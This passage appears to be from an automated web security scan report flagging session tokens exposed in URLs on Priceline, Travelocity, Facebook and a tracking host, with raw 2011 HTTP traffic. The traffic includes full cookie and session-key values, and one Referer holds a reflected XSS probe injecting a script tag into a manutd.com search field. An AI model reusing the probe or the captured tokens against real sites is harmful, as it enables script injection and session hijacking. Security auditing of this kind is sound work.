Referer: http://travel.travelocity.com/pub/gwt/hotel/esf/3EF72E9199C4983B05BF027C4F5C4217.cache.html?jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

5|0|6|http://travel.travelocity.com/pub/gwt/hotel/esf/|20BCC8EF5EB9AF0ECBD2A50D0ED60D3D|com.travelocity.ui.gwt.hotel.common.HotelResultListService|retrieve|Z|java.lang.Integer/3438268394|1|2|3|4|2|5|6
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:00 GMT
Server: Apache
Content-Disposition: attachment
Content-Length: 140
Connection: close
Content-Type: application/json;charset=utf-8

//EX[2,1,["com.travelocity.ui.gwt.hotel.common.exception.SessionExpiredException/1224607496","HotelResultListDTO not found in Session"],0,5]
10.22. http://travela.priceline.com/hotel/leaveBehindPop.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/leaveBehindPop.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hotel/leaveBehindPop.do?INIT_SESSION=false&src_path=RTL&src_page=LIST&trySecSwap=Y&checkInDate=10%2F04%2F2011&checkOutDate=10%2F07%2F2011&city=Boston%2C+MA&displayCity=Boston&cityID=3000008602&numberOfRooms=1&country=US&static=Y HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600744165:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.2.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:32:26 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5463010a2011100300322608e011577265; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=93E8720C5EB8B62C63F1FFE2A3CCE4FE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 959
Content-Type: text/html;charset=ISO-8859-1

<html>
<head>

<script language="Javascript">
function checkDom() {
   var sTest = "";
   var newURL;
   var thisURL = window.location.href;
   var bSecSwap = true;
   try{
       sTest = window.opener.doc
...[SNIP]...
10.23. http://travela.priceline.com/hotel/newHotelSearch.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 192
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:37 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=8F1936C519E8273F266A95D7A4654200; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491027


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/register.do?jsk=4663010a5564010a20111003003755e18011569968&INIT_SESSION=false">register</a>
...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/setupSignIn.do?jsk=4663010a5564010a20111003003755e18011569968&dact=getPersonalInfo.do&INIT_SESSION=false">update profile</a>
...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/setupSignIn.do?jsk=4663010a5564010a20111003003755e18011569968&dact=getDealPrefs.do&INIT_SESSION=false">deal preferences</a>
...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/setupSignIn.do?jsk=4663010a5564010a20111003003755e18011569968&dact=getRewardsInfo.do&INIT_SESSION=false">my rewards</a>
...[SNIP]...
10.24. http://travela.priceline.com/hotel/searchHotels.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 282
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:05 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a2011100300100584c011561872; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A10%3A05&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:10:05 GMT; Path=/
Set-Cookie: JSESSIONID=6F97BAD3EA8636704D7EC7753CCBB4DE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8901
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
10.25. http://travela.priceline.com/hotel/searchResults.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:11:15 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=A33FF447E496BF38ED169D142CD825A3; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/register.do?jsk=5463010a5064010a2011100300091519d011589950&INIT_SESSION=false">register</a>
...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/setupSignIn.do?jsk=5463010a5064010a2011100300091519d011589950&dact=getPersonalInfo.do&INIT_SESSION=false">update profile</a>
...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/setupSignIn.do?jsk=5463010a5064010a2011100300091519d011589950&dact=getDealPrefs.do&INIT_SESSION=false">deal preferences</a>
...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/setupSignIn.do?jsk=5463010a5064010a2011100300091519d011589950&dact=getRewardsInfo.do&INIT_SESSION=false">my rewards</a>
...[SNIP]...
10.26. http://travelocity.tt.omtrdc.net/m2/travelocity/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travelocity.tt.omtrdc.net
Path:   /m2/travelocity/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/travelocity/mbox/standard?mboxHost=www.travelocity.com&mboxSession=1317600481056-80236&mboxPage=1317600481056-80236&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxCount=1&ServiceTag=TRAVELOCITY&mbox=HMP&mboxId=0&mboxTime=1317582481071&mboxURL=http%3A%2F%2Fwww.travelocity.com%2F&mboxReferrer=http%3A%2F%2Fwww.travelocity.com%2Fresolve%2Fdefault&mboxVersion=39 HTTP/1.1
Host: travelocity.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 2713
Date: Mon, 03 Oct 2011 00:08:04 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('HMP',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-HMP-0">');mb
...[SNIP]...
10.27. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=120836677942069&app_id=120836677942069&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c169940c%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df4f4b2a24%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df64f7cd6%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13ca67784%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18123d9d%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.136.46
X-Cnection: close
Date: Mon, 03 Oct 2011 00:02:48 GMT
Content-Length: 234

<script type="text/javascript">
parent.postMessage("cb=f13ca67784&origin=http\u00253A\u00252F\u00252Fwww.nike.com\u00252Ff20d909cc&relation=parent&transport=postmessage&frame=f89532eac", "http:\/\/www
...[SNIP]...
10.28. http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /hotels/Lang/en-us/retail/retail_bounce.asp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pcln&KT=Y&ASID=514 HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 302 Object moved
Date: Mon, 03 Oct 2011 00:39:34 GMT
Server: Microsoft-IIS/6.0
Location: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A
Content-Length: 568
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb
...[SNIP]...
10.29. http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /hotels/Lang/en-us/retail/retail_bounce.asp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pcln&KT=Y&ASID=514 HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 302 Object moved
Date: Mon, 03 Oct 2011 00:39:34 GMT
Server: Microsoft-IIS/6.0
Location: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A
Content-Length: 568
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&amp;plf=pclh&amp;INIT_SESSION=true&amp;refid=PLAWAYNETWORK&amp;refclickid=TRIP_HOTELSEARCH&amp;searchType=CITY&amp;cityName=bos&amp;numberOfRooms=1&amp;hotelBrand=&amp;searchHotelName=&amp;starRating=-1&amp;checkInDate=10%2F09%2F2011&amp;checkOutDate=10%2F16%2F2011&amp;KMode=Y&amp;selectedTab=0&amp;passingValues=YES&amp;affiliateSubID=514A">here</a>
...[SNIP]...
10.30. http://www.priceline.com/hotels/lang/en-us/itinerary.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /hotels/lang/en-us/itinerary.asp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /hotels/lang/en-us/itinerary.asp?session_key=721510AC6F1410AC2011100300373191ec11270735&plf=pcln&RefID=PLAWAYNETWORK&RefClickID=TRIP_HOTELSEARCH HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
Content-Length: 345
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; PSessKey=721510AC6F1410AC2011100300373191ec11270735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

OFFER%2FHOTELS%2F%40SEARCH_CITY=bos&OFFER%2FHOTELS%2F%40ROOM_COUNT=1&OFFER%2FHOTELS%2F%40ZONEID=&checkInDate=10%2F09%2F2011&CkInMonth=10&CkInDay=09&CkInYear=2011&checkOutDate=10%2F16%2F2011&CkOutMonth
...[SNIP]...

Response

HTTP/1.1 302 Object moved
Date: Mon, 03 Oct 2011 00:39:09 GMT
Server: Microsoft-IIS/6.0
Location: http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20111003003909435251213033&plf=pcln&KT=Y&ASID=514
Content-Length: 278
Content-Type: text/html
Set-Cookie: PSessKey=711510AC721510AC20111003003909435251213033; domain=.priceline.com; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20111003003909435251213033&amp;plf=pcln&amp;KT=Y&amp;ASID=514">here</a>
...[SNIP]...
